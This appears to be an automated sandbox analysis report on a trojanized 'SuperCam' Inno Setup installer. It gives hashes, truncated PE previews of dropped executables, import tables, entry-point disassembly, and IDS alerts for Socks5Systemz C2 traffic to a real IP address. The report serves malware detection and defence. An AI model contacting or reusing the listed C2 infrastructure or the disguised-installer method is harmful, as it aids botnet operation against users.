                                                  SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                  MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                  SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                  SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                  SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..
                                                  Process:C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmp
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:modified
                                                  Size (bytes):3562941
                                                  Entropy (8bit):6.411850629570214
                                                  Encrypted:false
                                                  SSDEEP:49152:FyUj5KcWyXZVa42TBlqEbIWUKKf9d22/dR5w7V9R:VjDhXm4m7qE8WUKKFd28dn09R
                                                  MD5:002737DAE0350F10594A62D75616F208
                                                  SHA1:69A75EA2CF12DAED3F64B08425DB0EA3CDA3CD9C
                                                  SHA-256:29109C7A1CF153A50D2E7BA1073F9CB7BA68D8F8CAA9E4C5880C21EC354A9501
                                                  SHA-512:B0024C4E5D90916BCAFC234C45CE240600AA272998D45D2292E2338385735835F4C727B7529C4FE4F4FFD114791B58C1434E1DC4C30D69E21450BF986D68098A
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe, Author: Joe Security
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 74%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L......L.....................Z....................@...........................6.......6.....................................4...,.......................................................................................\............................rsti3.............................. ..`.rstj3..V/.......0..................@..@.rstk3...d...0...0... ..............@....rsrc................P..............@..@.rstl3...J"..p...I".................`...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmp
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):715253
                                                  Entropy (8bit):6.514689093513873
                                                  Encrypted:false
                                                  SSDEEP:12288:V/kqO+1G7DMvrP537dzHsA6BllcOuGbnH3ERNIg9rNlQyRoh1K8xyFM:hkqZ1G7DMvrP537dzHsA6hcHGbH3E6hN
                                                  MD5:EE095CA6BABE9E8940B3CB68BD4E22D3
                                                  SHA1:827831F6BF5EAED1CA2B3F83EB4E5AE3B898A0CD
                                                  SHA-256:B16602E16307CE94294C9982BA6CC3CA59C3C83E6AB58898BF1E98A95F44B6C5
                                                  SHA-512:ED8C64A453FD5CFBDC824560FD151A1CE22001AAD4955C820395C4CEE56D641A30363E52F1F9D3A116EFF10D38B6641ECB0B21D6A3F9FF805CD6662D2DDB18C0
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 4%
                                                  Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t........................@..............................................@..............................`%..................................................................................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS.....l................................idata..`%.......&..................@....tls.....................................rdata..............................@..P.reloc..@.... ......................@..P.rsrc...............................@..P.....................J..............@..P........................................................................................................................................
                                                  Process:C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmp
                                                  File Type:InnoSetup Log SuperCam, version 0x30, 4880 bytes, 927537\user, "C:\Users\user\AppData\Local\SuperCam 1.1.2002.33"
                                                  Category:dropped
                                                  Size (bytes):4880
                                                  Entropy (8bit):4.756857434103965
                                                  Encrypted:false
                                                  SSDEEP:96:4nWarn8dHpikSj1l9E+eOIhAH7ICSss/Ln3vP:4nWarnEHpikSj7HIhgICSsAnX
                                                  MD5:995C61FC51D7E89888D0BDDA81E84F83
                                                  SHA1:3ED4D899953503A2D3ECDD3B9E4D22D1F4F01201
                                                  SHA-256:B86DAC74F47C67369DBB1D6A7CD4B199F9C66B517B1E521848ABC9AE81F74AB0
                                                  SHA-512:789777EF3801F2213001B9A302485A069D538EC836BE26B87428F05C1467A729D51BD0F6CD43030984272504CAD77F64206CD44CF9649103E606F3D5088FDF09
                                                  Malicious:false
                                                  Preview:Inno Setup Uninstall Log (b)....................................SuperCam........................................................................................................................SuperCam........................................................................................................................0...........%................................................................................................................XC...........$Y......Q....927537.user1C:\Users\user\AppData\Local\SuperCam 1.1.2002.33.............9.... .....)......IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll:User3
                                                  Process:C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmp
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):715253
                                                  Entropy (8bit):6.514689093513873
                                                  Encrypted:false
                                                  SSDEEP:12288:V/kqO+1G7DMvrP537dzHsA6BllcOuGbnH3ERNIg9rNlQyRoh1K8xyFM:hkqZ1G7DMvrP537dzHsA6hcHGbH3E6hN
                                                  MD5:EE095CA6BABE9E8940B3CB68BD4E22D3
                                                  SHA1:827831F6BF5EAED1CA2B3F83EB4E5AE3B898A0CD
                                                  SHA-256:B16602E16307CE94294C9982BA6CC3CA59C3C83E6AB58898BF1E98A95F44B6C5
                                                  SHA-512:ED8C64A453FD5CFBDC824560FD151A1CE22001AAD4955C820395C4CEE56D641A30363E52F1F9D3A116EFF10D38B6641ECB0B21D6A3F9FF805CD6662D2DDB18C0
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 4%
                                                  Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t........................@..............................................@..............................`%..................................................................................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS.....l................................idata..`%.......&..................@....tls.....................................rdata..............................@..P.reloc..@.... ......................@..P.rsrc...............................@..P.....................J..............@..P........................................................................................................................................
                                                  Process:C:\Users\user\Desktop\vc8Kx5C54G.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):704000
                                                  Entropy (8bit):6.506162581050138
                                                  Encrypted:false
                                                  SSDEEP:12288:t/kqO+1G7DMvrP537dzHsA6BllcOuGbnH3ERNIg9rNlQyRoh1K8xyF:pkqZ1G7DMvrP537dzHsA6hcHGbH3E6hs
                                                  MD5:04B1C24DA7892C010556F7B7C0E3160A
                                                  SHA1:06640CFF79E25F1C8E8532B1C89AC50CC8815F66
                                                  SHA-256:B93307DF9E4925CC77D0F9F142D67B9D84DC6E6E6E029691DB9860ADEBDDDED1
                                                  SHA-512:3AFE86812AC324D2DF981FFBF0F4C876A086E95BAE3A716C9BC012FC115BC9F2A9734E3D17229F877182F0F1B957922C3101EA4C9361BC67525F932AA06F9E67
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 4%
                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t........................@..............................................@..............................`%..................................................................................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS.....l................................idata..`%.......&..................@....tls.....................................rdata..............................@..P.reloc..@.... ......................@..P.rsrc...............................@..P.....................J..............@..P........................................................................................................................................
                                                  Process:C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmp
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):2560
                                                  Entropy (8bit):2.8818118453929262
                                                  Encrypted:false
                                                  SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                  MD5:A69559718AB506675E907FE49DEB71E9
                                                  SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                  SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                  SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmp
                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):6144
                                                  Entropy (8bit):4.215994423157539
                                                  Encrypted:false
                                                  SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
                                                  MD5:4FF75F505FDDCC6A9AE62216446205D9
                                                  SHA1:EFE32D504CE72F32E92DCF01AA2752B04D81A342
                                                  SHA-256:A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
                                                  SHA-512:BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmp
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                  Category:dropped
                                                  Size (bytes):23312
                                                  Entropy (8bit):4.596242908851566
                                                  Encrypted:false
                                                  SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                  MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                  SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                  SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                  SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Entropy (8bit):7.998094989551995
                                                  TrID:
                                                  • Win32 Executable (generic) a (10002005/4) 98.86%
                                                  • Inno Setup installer (109748/4) 1.08%
                                                  • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                  • DOS Executable Generic (2002/1) 0.02%
                                                  File name:vc8Kx5C54G.exe
                                                  File size:3'775'914 bytes
                                                  MD5:2a64b62e8ed1c42a2487233e83d9966d
                                                  SHA1:1f72177f8d8c7e5b79e89ea3409817944e8fddc2
                                                  SHA256:644eeb4227d395ffd4de04707607098d39281999d7b99746e34a3bdbfc0bd47c
                                                  SHA512:c358d9397138933154267f622d921483cf6c2350b3d40a075c9be101e5cbe36c85e41246cf1848f78206866f762139d39b346a4f44c1111edcb8db87a3ac4653
                                                  SSDEEP:98304:NVf3lxAIJ2iWDUamdpZfoOSELSnpFfpsaLjIX4YISol8Crj:1GIJ1WIzpkBFfGaPSol8C/
                                                  TLSH:51063301BBF7E479D03206B0DCB64190EA4EBF370E756414B4D94F4A6BB6A0A496C3DB
                                                  File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                  Icon Hash:2d2e3797b32b2b99
                                                  Entrypoint:0x409c40
                                                  Entrypoint Section:CODE
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:1
                                                  OS Version Minor:0
                                                  File Version Major:1
                                                  File Version Minor:0
                                                  Subsystem Version Major:1
                                                  Subsystem Version Minor:0
                                                  Import Hash:884310b1928934402ea6fec1dbd3cf5e
                                                  Instruction
                                                  push ebp
                                                  mov ebp, esp
                                                  add esp, FFFFFFC4h
                                                  push ebx
                                                  push esi
                                                  push edi
                                                  xor eax, eax
                                                  mov dword ptr [ebp-10h], eax
                                                  mov dword ptr [ebp-24h], eax
                                                  call 00007F363C7F60FBh
                                                  call 00007F363C7F7302h
                                                  call 00007F363C7F7591h
                                                  call 00007F363C7F95C8h
                                                  call 00007F363C7F960Fh
                                                  call 00007F363C7FBF3Eh
                                                  call 00007F363C7FC0A5h
                                                  xor eax, eax
                                                  push ebp
                                                  push 0040A2FCh
                                                  push dword ptr fs:[eax]
                                                  mov dword ptr fs:[eax], esp
                                                  xor edx, edx
                                                  push ebp
                                                  push 0040A2C5h
                                                  push dword ptr fs:[edx]
                                                  mov dword ptr fs:[edx], esp
                                                  mov eax, dword ptr [0040C014h]
                                                  call 00007F363C7FCB0Bh
                                                  call 00007F363C7FC73Eh
                                                  lea edx, dword ptr [ebp-10h]
                                                  xor eax, eax
                                                  call 00007F363C7F9BF8h
                                                  mov edx, dword ptr [ebp-10h]
                                                  mov eax, 0040CE24h
                                                  call 00007F363C7F61A7h
                                                  push 00000002h
                                                  push 00000000h
                                                  push 00000001h
                                                  mov ecx, dword ptr [0040CE24h]
                                                  mov dl, 01h
                                                  mov eax, 0040738Ch
                                                  call 00007F363C7FA487h
                                                  mov dword ptr [0040CE28h], eax
                                                  xor edx, edx
                                                  push ebp
                                                  push 0040A27Dh
                                                  push dword ptr fs:[edx]
                                                  mov dword ptr fs:[edx], esp
                                                  call 00007F363C7FCB7Bh
                                                  mov dword ptr [0040CE30h], eax
                                                  mov eax, dword ptr [0040CE30h]
                                                  cmp dword ptr [eax+0Ch], 01h
                                                  jne 00007F363C7FCCBAh
                                                  mov eax, dword ptr [0040CE30h]
                                                  mov edx, 00000028h
                                                  call 00007F363C7FA888h
                                                  mov edx, dword ptr [00000030h]
                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xd0000x950.idata
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x110000x2c00.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0xf0000x18.rdata
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  CODE0x10000x93640x94002c410dfc3efd04d9b69c35c70921424eFalse0.6147856841216216data6.560885192755103IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  DATA0xb0000x24c0x400d5ea23d4ecf110fd2591314cbaa84278False0.310546875data2.7390956346874638IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  BSS0xc0000xe880x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .idata0xd0000x9500xa00bb5485bf968b970e5ea81292af2acdbaFalse0.414453125data4.430733069799036IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .tls0xe0000x80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .rdata0xf0000x180x2009ba824905bf9c7922b6fc87a38b74366False0.052734375data0.2044881574398449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                  .reloc0x100000x8b40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                  .rsrc0x110000x2c000x2c00681442c7fd25a49ee2674e7de9c84414False0.3231534090909091data4.472143355867112IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  RT_ICON0x113540x128Device independent bitmap graphic, 16 x 32 x 4, image size 192DutchNetherlands0.5675675675675675
                                                  RT_ICON0x1147c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 320DutchNetherlands0.4486994219653179
                                                  RT_ICON0x119e40x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640DutchNetherlands0.4637096774193548
                                                  RT_ICON0x11ccc0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152DutchNetherlands0.3935018050541516
                                                  RT_STRING0x125740x2f2data0.35543766578249336
                                                  RT_STRING0x128680x30cdata0.3871794871794872
                                                  RT_STRING0x12b740x2cedata0.42618384401114207
                                                  RT_STRING0x12e440x68data0.75
                                                  RT_STRING0x12eac0xb4data0.6277777777777778
                                                  RT_STRING0x12f600xaedata0.5344827586206896
                                                  RT_RCDATA0x130100x2cdata1.1818181818181819
                                                  RT_GROUP_ICON0x1303c0x3edataEnglishUnited States0.8387096774193549
                                                  RT_VERSION0x1307c0x4b8COM executable for DOSEnglishUnited States0.27980132450331124
                                                  RT_MANIFEST0x135340x560XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4251453488372093
                                                  DLLImport
                                                  kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
                                                  user32.dllMessageBoxA
                                                  oleaut32.dllVariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
                                                  advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
                                                  kernel32.dllWriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SizeofResource, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LockResource, LoadResource, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, GetACP, InterlockedExchange, FormatMessageA, FindResourceA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
                                                  user32.dllTranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
                                                  comctl32.dllInitCommonControls
                                                  advapi32.dllAdjustTokenPrivileges
                                                  Language of compilation systemCountry where language is spokenMap
                                                  DutchNetherlands
                                                  EnglishUnited States
                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                  2024-12-25T09:17:54.149955+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449736185.196.9.6780TCP
                                                  2024-12-25T09:17:54.149955+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449736185.196.9.6780TCP
                                                  2024-12-25T09:17:55.752769+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449737185.196.9.6780TCP
                                                  2024-12-25T09:17:55.752769+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449737185.196.9.6780TCP
                                                  2024-12-25T09:17:57.438512+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449740185.196.9.6780TCP
                                                  2024-12-25T09:17:57.438512+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449740185.196.9.6780TCP
                                                  2024-12-25T09:17:59.027945+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449741185.196.9.6780TCP
                                                  2024-12-25T09:17:59.027945+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449741185.196.9.6780TCP
                                                  2024-12-25T09:18:00.623810+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449747185.196.9.6780TCP
                                                  2024-12-25T09:18:00.623810+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449747185.196.9.6780TCP
                                                  2024-12-25T09:18:02.216329+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449753185.196.9.6780TCP
                                                  2024-12-25T09:18:02.216329+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449753185.196.9.6780TCP
                                                  2024-12-25T09:18:03.809859+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449754185.196.9.6780TCP
                                                  2024-12-25T09:18:03.809859+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449754185.196.9.6780TCP
                                                  2024-12-25T09:18:05.398301+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449760185.196.9.6780TCP
                                                  2024-12-25T09:18:05.398301+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449760185.196.9.6780TCP
                                                  2024-12-25T09:18:05.973086+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449760185.196.9.6780TCP
                                                  2024-12-25T09:18:05.973086+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449760185.196.9.6780TCP
                                                  2024-12-25T09:18:07.563017+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449766185.196.9.6780TCP
                                                  2024-12-25T09:18:07.563017+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449766185.196.9.6780TCP
                                                  2024-12-25T09:18:09.155867+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449772185.196.9.6780TCP
                                                  2024-12-25T09:18:09.155867+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449772185.196.9.6780TCP
                                                  2024-12-25T09:18:10.748577+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449778185.196.9.6780TCP
                                                  2024-12-25T09:18:10.748577+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449778185.196.9.6780TCP
                                                  2024-12-25T09:18:12.340143+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449779185.196.9.6780TCP
                                                  2024-12-25T09:18:12.340143+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449779185.196.9.6780TCP
                                                  2024-12-25T09:18:13.932504+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449785185.196.9.6780TCP
                                                  2024-12-25T09:18:13.932504+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449785185.196.9.6780TCP
                                                  2024-12-25T09:18:15.537501+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449791185.196.9.6780TCP
                                                  2024-12-25T09:18:15.537501+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449791185.196.9.6780TCP
                                                  2024-12-25T09:18:16.120016+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449791185.196.9.6780TCP
                                                  2024-12-25T09:18:16.120016+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449791185.196.9.6780TCP
                                                  2024-12-25T09:18:16.701518+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449791185.196.9.6780TCP
                                                  2024-12-25T09:18:16.701518+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449791185.196.9.6780TCP
                                                  2024-12-25T09:18:18.344463+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449797185.196.9.6780TCP
                                                  2024-12-25T09:18:18.344463+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449797185.196.9.6780TCP
                                                  2024-12-25T09:18:19.930721+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449803185.196.9.6780TCP
                                                  2024-12-25T09:18:19.930721+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449803185.196.9.6780TCP
                                                  2024-12-25T09:18:21.568883+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449809185.196.9.6780TCP
                                                  2024-12-25T09:18:21.568883+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449809185.196.9.6780TCP
                                                  2024-12-25T09:18:23.171770+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449810185.196.9.6780TCP
                                                  2024-12-25T09:18:23.171770+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449810185.196.9.6780TCP
                                                  2024-12-25T09:18:24.759622+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449816185.196.9.6780TCP
